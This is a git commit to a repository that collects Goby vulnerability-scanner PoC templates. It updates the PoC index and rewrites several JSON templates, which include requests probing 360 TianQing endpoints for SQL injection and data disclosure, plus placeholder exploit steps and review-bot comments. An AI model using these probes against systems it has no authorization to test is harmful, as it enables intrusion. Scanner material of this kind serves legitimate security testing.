test 2023-05-12 05:11:32 +00:00
parent 44ea24f39d
commit 72b29aaee0
42 changed files with 1859 additions and 782 deletions


@ -1,47 +1,47 @@
## goby poc (共1112个) 最近一次检查时间 2023-05-11 05:10:39
## goby poc (共1112个) 最近一次检查时间 2023-05-12 05:11:32
### 收集记录
| 文件名称 | 收录时间 |
| :----| :---- |
| [Samsung_WLAN_AP_WEA453e_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [DedeCMS_Carbuyaction_FileInclude.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [fahuo100_sql_injection_CNVD_2021_30193.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [360_Tianqing_database_information_disclosure.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [VENGD_Arbitrary_File_Upload.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Discuz_Wechat_Plugins_Unauth.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [H3C_IMC_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [SonarQube_unauth_CVE_2020_27986.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [IceWarp_WebClient_basic_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Jitong_EWEBS_phpinfo_leak.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Active_UC_index.action_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Security_Devices_Hardcoded_Password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [GitLab_SSRF_CVE_2021_22214.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [VMWare_Operations_vRealize_Operations_Manager_API<br>_SSRF_CVE_2021_21975.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Discuz_RCE_WOOYUN_2010_080723.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Atlassian_Confluence_OGNL_injection_CVE_2021_2608<br>4.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [alibaba_canal_default_password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [IRDM4000_Smart_station_Unauthorized_access.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Fastmeeting_Arbitrary_File_Read.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [YAPI_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Consul_Rexec_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Apache_Airflow_Unauthorized.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [VMware_vCenter_v7.0.2_Arbitrary_File_Read.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Discuz_v72_SQLI.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [FineReport_v9_Arbitrary_File_Overwrite.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Apache_Kylin_Unauthorized_configuration_disclosur<br>e.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [360_TianQing_ccid_SQL_injectable.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Datang_AC_Default_Password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Docker_Registry_API_Unauth.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Konga_Default_JWT_KEY.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Aspcms_Backend_Leak.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [ClickHouse_SQLI.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Apache_Kylin_Console_Default_password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Weaver_OA_8_SQL_injection.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Lanproxy_Directory_traversal_CVE_2021_3019.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Cacti_Weathermap_File_Write.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Alibaba_Nacos_Add_user_not_authorized.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [RuoYi_Druid_Unauthorized_access.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [Alibaba_Nacos_Default_password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [OpenSNS_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-05-11 05:09:33 |
| [360_Tianqing_database_information_disclosure.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [VENGD_Arbitrary_File_Upload.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Discuz_Wechat_Plugins_Unauth.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [H3C_IMC_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [SonarQube_unauth_CVE_2020_27986.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [IceWarp_WebClient_basic_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Jitong_EWEBS_phpinfo_leak.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Active_UC_index.action_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Security_Devices_Hardcoded_Password.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [GitLab_SSRF_CVE_2021_22214.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [VMWare_Operations_vRealize_Operations_Manager_API<br>_SSRF_CVE_2021_21975.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Discuz_RCE_WOOYUN_2010_080723.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Atlassian_Confluence_OGNL_injection_CVE_2021_2608<br>4.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [alibaba_canal_default_password.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [IRDM4000_Smart_station_Unauthorized_access.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Fastmeeting_Arbitrary_File_Read.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [YAPI_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Consul_Rexec_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Apache_Airflow_Unauthorized.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [VMware_vCenter_v7.0.2_Arbitrary_File_Read.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Discuz_v72_SQLI.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [FineReport_v9_Arbitrary_File_Overwrite.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Apache_Kylin_Unauthorized_configuration_disclosur<br>e.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [360_TianQing_ccid_SQL_injectable.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Datang_AC_Default_Password.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Docker_Registry_API_Unauth.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Konga_Default_JWT_KEY.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Aspcms_Backend_Leak.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [ClickHouse_SQLI.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Apache_Kylin_Console_Default_password.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Weaver_OA_8_SQL_injection.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Lanproxy_Directory_traversal_CVE_2021_3019.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Cacti_Weathermap_File_Write.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Alibaba_Nacos_Add_user_not_authorized.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [RuoYi_Druid_Unauthorized_access.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Alibaba_Nacos_Default_password.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [OpenSNS_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:42 |
| [Samsung_WLAN_AP_WEA453e_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:41 |
| [DedeCMS_Carbuyaction_FileInclude.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:41 |
| [fahuo100_sql_injection_CNVD_2021_30193.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-05-12 05:10:41 |
| [Samsung_WLAN_AP_wea453e_router_RCE.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-04-20 05:12:18 |
| [Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Re<br>ad_CVE_2021_21402.json](https://github.com/hanc00l/pocGoby2Xray) | 2023-04-20 05:12:18 |
| [poc.go](https://github.com/hanc00l/pocGoby2Xray) | 2023-04-20 05:12:18 |

240
data.json

@ -5359,204 +5359,204 @@
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-04-20 05:12:18"
},
"465626f5ffd33c92d2b540083c0fc479": {
"db406159976a18c09450d5e134706387": {
"name": "Samsung_WLAN_AP_WEA453e_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:41"
},
"c22a7eded164de18b9b08b1073c24a48": {
"513fef84b397b9714253b3b368179e20": {
"name": "DedeCMS_Carbuyaction_FileInclude.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:41"
},
"3e8c98edb79eb77daa6b45d8d70f03a3": {
"919d80e8c84e30fd9638679cdee90caa": {
"name": "fahuo100_sql_injection_CNVD_2021_30193.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:41"
},
"b1ae8cb2f529f5eee60bf5c30d1e2df0": {
"1afa191a8421b3c5bc7c4da97b6235bc": {
"name": "360_Tianqing_database_information_disclosure.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"cac943f12f9ed2f205014ff87fbbc35b": {
"55ad80db239956a843223438a850ac04": {
"name": "VENGD_Arbitrary_File_Upload.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"4e566c87e02a8d2eae142e7f2c57e962": {
"566c622e106572be52c49ea3fc279874": {
"name": "Discuz_Wechat_Plugins_Unauth.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"b69a1315894702869a7e904234655abf": {
"cd97b511ed98de73cc7b9c89e9f48218": {
"name": "H3C_IMC_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"434ec564211e33791d5e1961f1b3ebb8": {
"f01ced36d8b3caefb829354bd6fd7fc1": {
"name": "SonarQube_unauth_CVE_2020_27986.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"5e17ce4d593835c34fc2ed48eb6ff481": {
"41237e0d7696201d59664dd219abd3cb": {
"name": "IceWarp_WebClient_basic_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"30e31bbcb3e3a1c3e726c8712dc9a413": {
"1386b44e85f2afe55acb33cdc6dd26e5": {
"name": "Jitong_EWEBS_phpinfo_leak.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"87adadd634cc919ad6b5e7b4842bb35e": {
"c07ba5da657d52f1ee2bf6104750c3f4": {
"name": "Active_UC_index.action_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"33322c6293c00e0177f01ac3889dd0e9": {
"fcbf0d616b0057f605aec56bedf7f368": {
"name": "Security_Devices_Hardcoded_Password.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"49963f2392dff43d6ba9478a39ef9b54": {
"1114c43aff54e07c9c7bc5511f86a154": {
"name": "GitLab_SSRF_CVE_2021_22214.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"a95b89986a79c91a7f59d9d75ec942ac": {
"698f8ae7a4aff0669896491d060b9d0f": {
"name": "VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"cae0710ea595f0910a36af1981e6e296": {
"0adbc3de8b02a58343f6a3fc5eabda45": {
"name": "Discuz_RCE_WOOYUN_2010_080723.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"536988b739b6d41934e36855a7f359ee": {
"5862dcc3f7516a20a57490e6fa4d7690": {
"name": "Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"50b9e8e21d6f76d37b80f189ed8664d1": {
"5a1f57f97b1337ac13f038768b9c46e5": {
"name": "alibaba_canal_default_password.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"f05c778d0dec965304b0652b2ecadc46": {
"68ba57a4bd670c0c42c35d21e4f5dc26": {
"name": "IRDM4000_Smart_station_Unauthorized_access.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"e4a9fa38a80c8efb2728562e7f347ba5": {
"d50c1b89c61b3b68b5d1181a6841af52": {
"name": "Fastmeeting_Arbitrary_File_Read.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"87a7cd5e962fbfbaf8d239ba4471ba25": {
"f4b060111ff19956236844be0e0d0eef": {
"name": "YAPI_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"b3c4ed50cda74c9f027bd85463dc5986": {
"fed516d8fa1974abb4ac2f1fd3d80800": {
"name": "Consul_Rexec_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"ec3a00491923a14f6cb1d9d44c09c6ac": {
"00e57ee9b2dd0e50d2d41464d79b05f1": {
"name": "Apache_Airflow_Unauthorized.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"5b6f0bfa4927b535a749e3d7f76faca4": {
"3b1db00d2d2247346b3f1d417569b8ce": {
"name": "VMware_vCenter_v7.0.2_Arbitrary_File_Read.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"cd7c79c4a8f5954dfc9b94e5572cf7a8": {
"96d085787d489b574554b16d4faa9882": {
"name": "Discuz_v72_SQLI.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"63e384aaef52dc2beac087d21740d2ea": {
"5fcf6c18ba2d72c0c7ae722c9e76a517": {
"name": "FineReport_v9_Arbitrary_File_Overwrite.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"bdd6387e6ebfdc1d155e0d80a4afe068": {
"d6bad5f70686858fd05c9e312dfabdb6": {
"name": "Apache_Kylin_Unauthorized_configuration_disclosure.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"8f0b5dc58420ec1e6bf9d5eebb198546": {
"c667250e8ec2a946aaaee7879a88a541": {
"name": "360_TianQing_ccid_SQL_injectable.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"534f7819797de150b1c0411dd4a2c869": {
"52266baa33db1cf175f371903e5a1aa9": {
"name": "Datang_AC_Default_Password.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"12dc028570c676ed6304d2b56f219c1e": {
"9f64f2d8bf3a124e1ebf2d4395870ca0": {
"name": "Docker_Registry_API_Unauth.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"63e7fcd14c98d13658565ac3aa5126f0": {
"8211bdcd16f68a1fb2549e5df9e4f3c7": {
"name": "Konga_Default_JWT_KEY.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"79733cc4aef1d73f095647ddd6902224": {
"85c8494e7b893bc0b65badffbc549556": {
"name": "Aspcms_Backend_Leak.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"9ab5251e9bd107631260838907f894be": {
"4d77792cc7287d63774faee7f1395bef": {
"name": "ClickHouse_SQLI.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"eccacf2cea1bb6a40088b1f9e43fe595": {
"c53bd0683e3ae4a6181040f5952445dd": {
"name": "Apache_Kylin_Console_Default_password.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"0b8fcbde235a2adad1aff3dc1080467e": {
"4c4cbf98683b8bfadc80ee4231dbb779": {
"name": "Weaver_OA_8_SQL_injection.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"e646ceb6b2a9ec480bbd4623d4325f32": {
"9e734128624dc8dd76a46831a7e9721a": {
"name": "Lanproxy_Directory_traversal_CVE_2021_3019.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"4181aeaee11b9ea93856a49a8e0159be": {
"8b236a6f58657465085590d4b5c1e244": {
"name": "Cacti_Weathermap_File_Write.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"9d9add12c6a10caa7b95737ddc272dad": {
"937d584fb24d1ab86aea5cfbe2300af8": {
"name": "Alibaba_Nacos_Add_user_not_authorized.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"2f341afe61cba3b5b2104d60e41083b2": {
"01f0fb1ab3f35ddf53969011a3553c07": {
"name": "RuoYi_Druid_Unauthorized_access.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"b5a392b27a98471d7a85fceb83f8c2bb": {
"bdd884a8409510102c311e67bf8fbf35": {
"name": "Alibaba_Nacos_Default_password.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
},
"c11dc72c6b76260ea064ec6d065c2c4e": {
"ddaeaa89570178bc8ac021dee5c446a2": {
"name": "OpenSNS_RCE.json",
"from": "https://github.com/cqr-cryeye-forks/goby-pocs",
"up_time": "2023-05-11 05:09:33"
"from": "https://github.com/hanc00l/pocGoby2Xray",
"up_time": "2023-05-12 05:10:42"
}
}


@ -1,17 +1,23 @@
{
"Name": "360 TianQing ccid SQL injectable",
"Level": "2",
"Tags": [],
"GobyQuery": "app=\"360-TianQing\"",
"Description": "The attacker can get the server permission by injecting SQL into the upload Trojan",
"Product": "360 TianQing",
"Homepage": "htp://360.cn",
"Author": "PeiQi",
"Impact": "<p>The attacker can get the server permission by injecting SQL into the upload Trojan<br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
"Tags": [
"sqli"
],
"GobyQuery": "app=\"360-TianQing\"",
"Description": "",
"Product": "360 TianQing",
"Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
"Author": "",
"Impact": "The attacker can get the server permission by injecting SQL into the upload Trojan.",
"Recommendation": "update",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -19,7 +25,7 @@
"method": "GET",
"uri": "/api/dp/rptsvcsyncpoint?ccid=1",
"follow_redirect": true,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -60,6 +66,43 @@
"SetVariable": []
}
],
"PostTime": "2021-04-09 08:51:50",
"GobyVersion": "1.8.255"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
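Review bot: The `ExploitSteps` block that appears to be added here is a converter stub (a GET to `/test.php` that passes on a 200 whose body contains `test`), yet the record is marked `"HasExp": true`; set `"HasExp": false` and leave the stub out until a real verification step exists. The same stub and flag recur in the 360 TianQing database information disclosure and Alibaba Nacos Default Password sections of this commit. The rewrite also empties `Author` and `References` and zeroes `PostTime` and `GobyVersion`, so the entry can no longer be traced to its advisory or dated; keep the previous values, e.g. `"References": ["http://wiki.peiqi.tech"]` and `"PostTime": "2021-04-09 08:51:50"`. The +/- markers are lost on this page, so old and new are inferred from the `Recommandation` → `Recommendation` rename.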


@ -1,19 +1,23 @@
{
"Name": "360 Tianqing database information disclosure",
"Name": "360 TianQing database information disclosure",
"Level": "0",
"Tags": [
"Disclosure of Sensitive Information"
],
"GobyQuery": "app=\"360-TianQing\"",
"Description": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information",
"Product": "360 Tianqing",
"Homepage": "https://www.360.cn/",
"Author": "PeiQi",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"Description": "",
"Product": "360 TianQing",
"Homepage": "https://360.net/product-center/Endpoint-Security/management-system",
"Author": "",
"Impact": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information.",
"Recommendation": "update",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -21,7 +25,7 @@
"method": "GET",
"uri": "/api/dbstat/gettablessize",
"follow_redirect": false,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -62,6 +66,43 @@
"SetVariable": []
}
],
"PostTime": "2021-04-08 16:04:28",
"GobyVersion": "1.8.255"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
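Review bot: The new `Impact` string copies the old description's stutter ("unauthorized unauthorized unauthorized access") while `Description` is left empty, so the only prose left in the record is garbled. Suggest `"Impact": "TianQing has an unauthorized access flaw, resulting in the disclosure of sensitive information."` and restoring a one-line `Description`. `"Recommendation": "update"` replaces `<p>undefined</p>` but still names no fixed version or compensating control; if the vendor fix is unknown, say so explicitly and recommend restricting access to the management API.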


@ -1,28 +1,29 @@
{
"Name": "Active UC index.action 远程命令执行漏洞",
"Name": "Active UC index.action RCE",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "title=\"网动统一通信平台(Active UC)\"",
"Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令",
"Product": "网动统一通信平台(Active UC)",
"Homepage": "https://gobies.org/",
"Author": "luckying",
"Impact": "",
"Recommandation": "",
"References": [
